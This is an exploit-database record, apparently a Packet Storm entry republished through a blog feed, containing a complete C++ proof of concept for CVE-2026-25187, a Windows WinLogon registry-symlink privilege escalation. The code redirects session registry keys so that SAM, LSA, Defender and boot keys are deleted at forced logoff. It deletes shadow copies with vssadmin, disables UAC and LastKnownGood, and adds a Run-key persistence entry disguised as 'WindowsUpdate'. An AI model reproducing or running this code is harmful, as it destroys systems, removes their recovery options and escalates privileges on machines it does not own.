{“lastseen”:”2026-04-28T17:32:20″,”description”:”This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise. The exploit is built around abusing Registry symbolic links…”,”published”:”2026-04-28T00:00:00″,”modified”:”2026-04-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft WinLogon Registry Deletion \/ Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:219937″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-25187″],”sourceData”:”==================================================================================================================================\\n | # Title : WinLogon Registry Deletion Exploit Privilege Escalation PoC |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : No standalone download available |\\n ==================================================================================================================================\\n \\n [+] Summary : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.\\n The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.\\n \\n [+] POC : \\n \\n #include \\u003cWindows.h\\u003e\\n #include \\u003ccomdef.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cvector\\u003e\\n #include \\u003cstring\\u003e\\n #include \\u003cmap\\u003e\\n #include \\u003cthread\\u003e\\n #include \\u003cchrono\\u003e\\n #include \\u003csddl.h\\u003e\\n #include \\u003cwinternl.h\\u003e\\n #include \\u003caclapi.h\\u003e\\n #include \\u003clm.h\\u003e\\n #pragma comment(lib, \\”advapi32.lib\\”)\\n #pragma comment(lib, \\”user32.lib\\”)\\n #pragma comment(lib, \\”netapi32.lib\\”)\\n #define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)\\n #define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)\\n \\n extern \\”C\\” {\\n NTSTATUS NTAPI NtCreateKey(\\n PHANDLE KeyHandle,\\n ACCESS_MASK DesiredAccess,\\n POBJECT_ATTRIBUTES ObjectAttributes,\\n ULONG TitleIndex,\\n PUNICODE_STRING Class,\\n ULONG CreateOptions,\\n PULONG Disposition\\n );\\n \\n NTSTATUS NTAPI NtOpenKeyEx(\\n PHANDLE KeyHandle,\\n ACCESS_MASK DesiredAccess,\\n POBJECT_ATTRIBUTES ObjectAttributes,\\n ULONG OpenOptions\\n );\\n \\n NTSTATUS NTAPI NtSetValueKey(\\n HANDLE KeyHandle,\\n PUNICODE_STRING ValueName,\\n ULONG TitleIndex,\\n ULONG Type,\\n PVOID Data,\\n ULONG DataSize\\n );\\n \\n NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);\\n NTSTATUS NTAPI NtOpenKey(\\n PHANDLE KeyHandle,\\n ACCESS_MASK DesiredAccess,\\n POBJECT_ATTRIBUTES ObjectAttributes\\n );\\n \\n NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);\\n VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);\\n }\\n class RegistryUtils {\\n public:\\n static std::wstring GetUserSid() {\\n HANDLE hToken = nullptr;\\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026hToken))\\n return L\\”\\”;\\n \\n DWORD dwSize = 0;\\n GetTokenInformation(hToken, TokenUser, nullptr, 0, \\u0026dwSize);\\n \\n std::vector\\u003cBYTE\\u003e buffer(dwSize);\\n if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, \\u0026dwSize)) {\\n CloseHandle(hToken);\\n return L\\”\\”;\\n }\\n \\n PTOKEN_USER pTokenUser = reinterpret_cast\\u003cPTOKEN_USER\\u003e(buffer.data());\\n LPWSTR lpSid = nullptr;\\n \\n if (!ConvertSidToStringSid(pTokenUser-\\u003eUser.Sid, \\u0026lpSid)) {\\n CloseHandle(hToken);\\n return L\\”\\”;\\n }\\n \\n std::wstring sid(lpSid);\\n LocalFree(lpSid);\\n CloseHandle(hToken);\\n \\n return sid;\\n }\\n \\n static std::wstring RegPathToNative(const std::wstring\\u0026 path) {\\n std::wstring regpath = L\\”\\\\\\\\Registry\\\\\\\\\\”;\\n \\n if (path.empty() || path[0] == L’\\\\\\\\’)\\n return path;\\n \\n if (path.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n return regpath + L\\”Machine\\\\\\\\\\” + path.substr(5);\\n }\\n else if (path.find(L\\”HKU\\\\\\\\\\”) == 0) {\\n return regpath + L\\”User\\\\\\\\\\” + path.substr(4);\\n }\\n else if (path.find(L\\”HKCU\\\\\\\\\\”) == 0) {\\n return regpath + L\\”User\\\\\\\\\\” + GetUserSid() + L\\”\\\\\\\\\\” + path.substr(5);\\n }\\n else if (path.find(L\\”HKCR\\\\\\\\\\”) == 0) {\\n return regpath + L\\”Machine\\\\\\\\Software\\\\\\\\Classes\\\\\\\\\\” + path.substr(5);\\n }\\n \\n return L\\”\\”;\\n }\\n \\n static bool CreateRegistrySymlink(const std::wstring\\u0026 symlink, const std::wstring\\u0026 target, bool isVolatile) {\\n std::wstring nativeSymlink = RegPathToNative(symlink);\\n std::wstring nativeTarget = RegPathToNative(target);\\n \\n if (nativeSymlink.empty() || nativeTarget.empty())\\n return false;\\n \\n printf(\\”[*] Creating symlink: %ls -\\u003e %ls\\\\n\\”, nativeSymlink.c_str(), nativeTarget.c_str());\\n DeleteRegistrySymlink(symlink);\\n \\n UNICODE_STRING name;\\n RtlInitUnicodeString(\\u0026name, nativeSymlink.c_str());\\n \\n OBJECT_ATTRIBUTES objAttr;\\n InitializeObjectAttributes(\\u0026objAttr, \\u0026name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\\n \\n HANDLE hKey = nullptr;\\n ULONG disposition = 0;\\n \\n ULONG options = INTERNAL_REG_OPTION_CREATE_LINK | \\n (isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);\\n \\n NTSTATUS status = NtCreateKey(\\u0026hKey, KEY_ALL_ACCESS, \\u0026objAttr, 0, nullptr, options, \\u0026disposition);\\n \\n if (status != 0) {\\n SetLastError(RtlNtStatusToDosError(status));\\n return false;\\n }\\n \\n UNICODE_STRING valueName;\\n RtlInitUnicodeString(\\u0026valueName, L\\”SymbolicLinkValue\\”);\\n \\n status = NtSetValueKey(hKey, \\u0026valueName, 0, REG_LINK, \\n (PVOID)nativeTarget.c_str(), \\n nativeTarget.length() * sizeof(WCHAR));\\n \\n CloseHandle(hKey);\\n \\n if (status != 0) {\\n SetLastError(RtlNtStatusToDosError(status));\\n return false;\\n }\\n \\n printf(\\”[+] Symlink created successfully\\\\n\\”);\\n return true;\\n }\\n \\n static bool DeleteRegistrySymlink(const std::wstring\\u0026 symlink) {\\n std::wstring nativeSymlink = RegPathToNative(symlink);\\n if (nativeSymlink.empty())\\n return false;\\n \\n UNICODE_STRING name;\\n RtlInitUnicodeString(\\u0026name, nativeSymlink.c_str());\\n \\n OBJECT_ATTRIBUTES objAttr;\\n InitializeObjectAttributes(\\u0026objAttr, \\u0026name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);\\n \\n HANDLE hKey = nullptr;\\n NTSTATUS status = NtOpenKeyEx(\\u0026hKey, DELETE, \\u0026objAttr, 0);\\n \\n if (status != 0) {\\n return true;\\n }\\n \\n status = NtDeleteKey(hKey);\\n CloseHandle(hKey);\\n \\n return status == 0;\\n }\\n \\n static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring\\u0026 subKey) {\\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, \\u0026hKey) != ERROR_SUCCESS) {\\n return false;\\n }\\n DWORD index = 0;\\n WCHAR valueName[256];\\n DWORD valueNameSize = 256;\\n \\n while (RegEnumValueW(hKey, index++, valueName, \\u0026valueNameSize, nullptr, \\n nullptr, nullptr, nullptr) == ERROR_SUCCESS) {\\n RegDeleteValueW(hKey, valueName);\\n valueNameSize = 256;\\n index–;\\n }\\n index = 0;\\n WCHAR subKeyName[256];\\n DWORD subKeyNameSize = 256;\\n \\n while (RegEnumKeyExW(hKey, index++, subKeyName, \\u0026subKeyNameSize, nullptr,\\n nullptr, nullptr, nullptr) == ERROR_SUCCESS) {\\n std::wstring fullPath = subKey + L\\”\\\\\\\\\\” + subKeyName;\\n DeleteRegistryTreeManual(rootKey, fullPath);\\n subKeyNameSize = 256;\\n index–;\\n }\\n \\n RegCloseKey(hKey);\\n return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;\\n }\\n };\\n \\n class WinLogonEoPExploit {\\n private:\\n std::wstring m_sessionPath;\\n std::vector\\u003cstd::pair\\u003cstd::wstring, std::wstring\\u003e\\u003e m_targets;\\n bool m_persistentMode;\\n \\n void InitializeTargets() {\\n \\n m_targets = {\\n {L\\”uac_bypass\\”, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System\\”},\\n {L\\” defender\\”, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows Defender\\”},\\n {L\\”security_policies\\”, L\\”HKLM\\\\\\\\SECURITY\\\\\\\\Policy\\”},\\n {L\\”lsa_config\\”, L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Lsa\\”},\\n {L\\”sam_key\\”, L\\”HKLM\\\\\\\\SAM\\\\\\\\SAM\\\\\\\\Domains\\\\\\\\Account\\”},\\n {L\\”cached_creds\\”, L\\”HKLM\\\\\\\\SECURITY\\\\\\\\Cache\\”},\\n {L\\”ci_policies\\”, L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\CI\\\\\\\\Policy\\”},\\n {L\\”code_integrity\\”, L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\DeviceGuard\\”},\\n {L\\”uac_settings\\”, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System\\\\\\\\UAC\\”},\\n {L\\”boot_config\\”, L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Boot\\”},\\n {L\\”winlogon\\”, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Winlogon\\”},\\n {L\\”critical_services\\”, L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Services\\”},\\n };\\n }\\n \\n std::wstring BuildSessionPath() {\\n DWORD sessionId = 0;\\n ProcessIdToSessionId(GetCurrentProcessId(), \\u0026sessionId);\\n \\n wchar_t path[512];\\n swprintf_s(path, L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Accessibility\\\\\\\\Session%d\\\\\\\\ATConfig\\”, \\n sessionId);\\n return std::wstring(path);\\n }\\n \\n bool PrepareRegistryTarget(const std::wstring\\u0026 targetPath) {\\n printf(\\”[*] Preparing target: %ls\\\\n\\”, targetPath.c_str());\\n \\n std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);\\n if (nativeTarget.empty()) {\\n printf(\\”[!] Invalid target path\\\\n\\”);\\n return false;\\n }\\n \\n HKEY hKey = nullptr;\\n std::wstring cleanPath = targetPath;\\n \\n if (cleanPath.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n cleanPath = cleanPath.substr(5);\\n }\\n \\n if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,\\n REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,\\n \\u0026hKey, nullptr) == ERROR_SUCCESS) {\\n DWORD dummy = 0xDEADBEEF;\\n RegSetValueExW(hKey, L\\”exploit_marker\\”, 0, REG_DWORD, \\n (BYTE*)\\u0026dummy, sizeof(dummy));\\n RegCloseKey(hKey);\\n printf(\\”[+] Target key created\/verified\\\\n\\”);\\n }\\n \\n return true;\\n }\\n \\n bool CreateMaliciousSymlink(const std::wstring\\u0026 targetPath) {\\n printf(\\”\\\\n[*] Creating malicious registry symlink…\\\\n\\”);\\n \\n std::wstring pathWithoutHKLM = m_sessionPath;\\n if (pathWithoutHKLM.find(L\\”HKLM\\\\\\\\\\”) == 0) {\\n pathWithoutHKLM = pathWithoutHKLM.substr(5);\\n }\\n \\n RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());\\n \\n if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {\\n printf(\\”[!] Failed to create symlink: %d\\\\n\\”, GetLastError());\\n return false;\\n }\\n \\n return true;\\n }\\n \\n bool TriggerLogout() {\\n printf(\\”\\\\n[*] Triggering user logout…\\\\n\\”);\\n \\n BOOL result = FALSE;\\n \\n result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);\\n if (result) {\\n printf(\\”[+] Logout initiated via ExitWindowsEx\\\\n\\”);\\n return true;\\n }\\n \\n result = InitiateSystemShutdownExW(nullptr, L\\”System will logout for maintenance\\”,\\n 5, TRUE, TRUE, \\n SHTDN_REASON_MAJOR_APPLICATION);\\n if (result) {\\n printf(\\”[+] Logout initiated via InitiateSystemShutdownEx\\\\n\\”);\\n return true;\\n }\\n HANDLE hToken = nullptr;\\n if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, \\u0026hToken)) {\\n TOKEN_PRIVILEGES tp;\\n LUID luid;\\n if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, \\u0026luid)) {\\n tp.PrivilegeCount = 1;\\n tp.Privileges[0].Luid = luid;\\n tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\\n AdjustTokenPrivileges(hToken, FALSE, \\u0026tp, 0, nullptr, 0);\\n }\\n CloseHandle(hToken);\\n }\\n \\n result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);\\n \\n return result != FALSE;\\n }\\n \\n void DisableRecoveryMechanisms() {\\n \\n printf(\\”[*] Disabling recovery mechanisms…\\\\n\\”);\\n \\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, \\n L\\”SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Session Manager\\\\\\\\Configuration Manager\\”,\\n 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n DWORD disable = 1;\\n RegSetValueExW(hKey, L\\”LastKnownGoodEnabled\\”, 0, REG_DWORD, \\n (BYTE*)\\u0026disable, sizeof(disable));\\n RegCloseKey(hKey);\\n }\\n \\n system(\\”vssadmin delete shadows \/all \/quiet \\u003e nul 2\\u003e\\u00261\\”);\\n }\\n \\n public:\\n WinLogonEoPExploit(bool persistentMode = false) \\n : m_persistentMode(persistentMode) {\\n InitializeTargets();\\n }\\n \\n bool ExploitSingleTarget(const std::wstring\\u0026 targetName, const std::wstring\\u0026 targetPath) {\\n printf(\\”\\\\n=== Attacking target: %ls ===\\\\n\\”, targetName.c_str());\\n \\n if (!PrepareRegistryTarget(targetPath))\\n return false;\\n \\n if (!CreateMaliciousSymlink(targetPath))\\n return false;\\n \\n if (!TriggerLogout()) {\\n printf(\\”[!] Failed to trigger logout\\\\n\\”);\\n return false;\\n }\\n \\n return true;\\n }\\n \\n bool ExploitMultipleTargets() {\\n printf(\\”\\\\n\\”);\\n printf(\\”========================================\\\\n\\”);\\n printf(\\” CVE-2026-25187 – WinLogon EoP Exploit\\\\n\\”);\\n printf(\\” Registry Deletion to SYSTEM\\\\n\\”);\\n printf(\\”========================================\\\\n\\\\n\\”);\\n \\n m_sessionPath = BuildSessionPath();\\n printf(\\”[*] Session path: %ls\\\\n\\”, m_sessionPath.c_str());\\n \\n RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n \\n if (m_persistentMode) {\\n AddPersistence();\\n }\\n \\n DisableRecoveryMechanisms();\\n \\n printf(\\”\\\\n[*] Available targets:\\\\n\\”);\\n for (size_t i = 0; i \\u003c m_targets.size(); i++) {\\n printf(\\” [%zu] %ls – %ls\\\\n\\”, i, m_targets[i].first.c_str(), m_targets[i].second.c_str());\\n }\\n \\n printf(\\”\\\\n[*] Targeting all critical keys for maximum impact…\\\\n\\”);\\n \\n for (const auto\\u0026 target : m_targets) {\\n \\n RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n \\n if (CreateMaliciousSymlink(target.second)) {\\n printf(\\”[+] Symlink created for %ls\\\\n\\”, target.first.c_str());\\n \\n Sleep(100);\\n }\\n }\\n \\n printf(\\”\\\\n[*] Triggering final logout for mass deletion…\\\\n\\”);\\n TriggerLogout();\\n \\n return true;\\n }\\n \\n void AddPersistence() {\\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_CURRENT_USER, \\n L\\”Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\”,\\n 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n \\n wchar_t path[MAX_PATH];\\n GetModuleFileNameW(nullptr, path, MAX_PATH);\\n \\n RegSetValueExW(hKey, L\\”WindowsUpdate\\”, 0, REG_SZ, \\n (BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));\\n RegCloseKey(hKey);\\n \\n printf(\\”[+] Persistence added to HKCU\\\\\\\\Run\\\\n\\”);\\n }\\n }\\n \\n bool CreateMassiveRegistryCorruption() {\\n \\n printf(\\”\\\\n[*] Creating massive registry corruption…\\\\n\\”);\\n \\n std::vector\\u003cstd::wstring\\u003e extraTargets = {\\n L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Session Manager\\\\\\\\Executive\\”,\\n L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\Session Manager\\\\\\\\Memory Management\\”,\\n L\\”HKLM\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\SecurityProviders\\\\\\\\SCHANNEL\\”,\\n L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Policies\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\System\\”,\\n L\\”HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\Explorer\\”,\\n };\\n \\n for (const auto\\u0026 target : extraTargets) {\\n RegistryUtils::DeleteRegistrySymlink(m_sessionPath);\\n \\n if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {\\n printf(\\”[+] Corruption symlink created for: %ls\\\\n\\”, target.c_str());\\n Sleep(50);\\n }\\n }\\n \\n return true;\\n }\\n };\\n \\n class PrivilegeEscalation {\\n public:\\n static bool DisableUAC() {\\n printf(\\”[*] Disabling UAC…\\\\n\\”);\\n \\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,\\n L\\”SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Policies\\\\\\\\System\\”,\\n 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n \\n DWORD disable = 0;\\n RegSetValueExW(hKey, L\\”EnableLUA\\”, 0, REG_DWORD, (BYTE*)\\u0026disable, sizeof(disable));\\n RegSetValueExW(hKey, L\\”ConsentPromptBehaviorAdmin\\”, 0, REG_DWORD, (BYTE*)\\u0026disable, sizeof(disable));\\n \\n RegCloseKey(hKey);\\n printf(\\”[+] UAC disabled (requires reboot)\\\\n\\”);\\n return true;\\n }\\n \\n return false;\\n }\\n \\n static bool GrantDebugPrivileges() {\\n printf(\\”[*] Granting debug privileges…\\\\n\\”);\\n \\n HKEY hKey = nullptr;\\n if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,\\n L\\”SECURITY\\\\\\\\Policy\\\\\\\\Privileges\\”,\\n 0, KEY_SET_VALUE, \\u0026hKey) == ERROR_SUCCESS) {\\n RegCloseKey(hKey);\\n return true;\\n }\\n \\n return false;\\n }\\n };\\n \\n int wmain(int argc, wchar_t* argv[]) {\\n printf(\\”\\\\n\\”);\\n printf(\\”========================================\\\\n\\”);\\n printf(\\” CVE-2026-25187 – Critical EoP Exploit\\\\n\\”);\\n printf(\\” WinLogon Registry Deletion to SYSTEM\\\\n\\”);\\n printf(\\”========================================\\\\n\\\\n\\”);\\n \\n bool massDeletion = false;\\n bool persistent = false;\\n int targetIndex = -1;\\n \\n for (int i = 1; i \\u003c argc; i++) {\\n if (_wcsicmp(argv[i], L\\”–mass\\”) == 0) {\\n massDeletion = true;\\n }\\n else if (_wcsicmp(argv[i], L\\”–persist\\”) == 0) {\\n persistent = true;\\n }\\n else if (_wcsicmp(argv[i], L\\”–target\\”) == 0 \\u0026\\u0026 i + 1 \\u003c argc) {\\n targetIndex = _wtoi(argv[++i]);\\n }\\n else if (_wcsicmp(argv[i], L\\”–help\\”) == 0) {\\n printf(\\”Usage: %s [options]\\\\n\\”, argv[0]);\\n printf(\\”Options:\\\\n\\”);\\n printf(\\” –mass Mass delete multiple critical keys\\\\n\\”);\\n printf(\\” –persist Add persistence to startup\\\\n\\”);\\n printf(\\” –target N Attack specific target by index\\\\n\\”);\\n printf(\\” –disable-uac Disable UAC after deletion\\\\n\\”);\\n printf(\\”\\\\nWARNING: This exploit will cause system instability!\\\\n\\”);\\n return 0;\\n }\\n }\\n \\n printf(\\”[!] WARNING: This exploit will delete critical registry keys!\\\\n\\”);\\n printf(\\”[!] System may become UNBOOTABLE or severely damaged.\\\\n\\”);\\n printf(\\”[!] Continue? (y\/N): \\”);\\n \\n wint_t ch = towlower(getwchar());\\n if (ch != L’y’) {\\n printf(\\”[*] Exploit aborted.\\\\n\\”);\\n return 0;\\n }\\n \\n WinLogonEoPExploit exploit(persistent);\\n \\n bool success = false;\\n \\n if (massDeletion) {\\n printf(\\”\\\\n[*] Running mass deletion mode…\\\\n\\”);\\n success = exploit.ExploitMultipleTargets();\\n exploit.CreateMassiveRegistryCorruption();\\n } else {\\n printf(\\”\\\\n[*] Available targets:\\\\n\\”);\\n printf(\\” 0 – UAC Bypass (Disable UAC)\\\\n\\”);\\n printf(\\” 1 – Windows Defender\\\\n\\”);\\n printf(\\” 2 – Security Policies\\\\n\\”);\\n printf(\\” 3 – LSA Configuration\\\\n\\”);\\n printf(\\” 4 – SAM (Password Hashes)\\\\n\\”);\\n printf(\\” 5 – Cached Credentials\\\\n\\”);\\n printf(\\” 6 – Code Integrity\\\\n\\”);\\n printf(\\” 7 – Boot Configuration (DoS)\\\\n\\”);\\n printf(\\” 8 – ALL (Mass Deletion)\\\\n\\”);\\n \\n int choice = targetIndex;\\n if (choice == -1) {\\n printf(\\”\\\\n[*] Select target (0-8): \\”);\\n wscanf_s(L\\”%d\\”, \\u0026choice);\\n }\\n \\n if (choice == 8) {\\n success = exploit.ExploitMultipleTargets();\\n } else if (choice \\u003e= 0 \\u0026\\u0026 choice \\u003c 8) {\\n auto\\u0026 target = exploit.m_targets[choice];\\n success = exploit.ExploitSingleTarget(target.first, target.second);\\n \\n if (choice == 0) {\\n PrivilegeEscalation::DisableUAC();\\n }\\n }\\n }\\n \\n if (success) {\\n printf(\\”\\\\n[+] Exploit triggered! System will logout now.\\\\n\\”);\\n printf(\\”[*] After login, check if target registry keys are deleted.\\\\n\\”);\\n Sleep(2000);\\n } else {\\n printf(\\”\\\\n[!] Exploit failed. Try running again or use different target.\\\\n\\”);\\n }\\n \\n return 0;\\n }\\n \\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219937″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219937\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-28T17:32:20″,”description”:”This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-49971","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n